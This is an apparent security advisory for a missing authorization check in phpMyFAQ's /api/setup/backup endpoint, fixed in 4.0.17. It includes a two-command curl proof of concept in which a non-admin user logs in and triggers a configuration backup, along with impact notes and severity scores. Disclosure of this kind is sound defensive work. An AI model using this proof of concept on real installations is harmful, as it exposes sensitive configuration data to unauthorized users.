CVE-2026-24421
phpMyFAQ: /api/setup/backup accessible to any authenticated user (authz missing)
Description
### Summary Authenticated non‑admin users can call /api/setup/backup and trigger a configuration backup. The endpoint only checks authentication, not authorization, and returns a link to the generated ZIP. ### Details SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged‑in user to create a sensitive backup and retrieve its path. ### PoC Precondition: API enabled, any authenticated non‑admin user. - Log in as a non‑admin user. - Call backup endpoint. ``` curl -c /tmp/pmf_api_cookies.txt \ -H 'Content-Type: application/json' \ -d '{"username":"tester","password":"Test1234!"}' \ http://192.168.40.16/phpmyfaq/api/v3.0/login curl -i -b /tmp/pmf_api_cookies.txt \ -X POST --data '4.0.16' \ http://192.168.40.16/phpmyfaq/api/setup/backup ``` ### Impact Low‑privileged users can generate sensitive backups. If the ZIP is web‑accessible (server misconfiguration), this can lead to secret exposure.
How to fix CVE-2026-24421
To remediate CVE-2026-24421, upgrade the affected package to a fixed version below.
- —upgrade to 4.0.17 or later
- —upgrade to 4.0.17 or later
Is CVE-2026-24421 being exploited?
Low — EPSS is 0.3%, meaning exploitation activity has not been observed at scale.
Affected packages (2)
- from 0, < 4.0.17
- from 0, < 4.0.17
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM6.5 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N |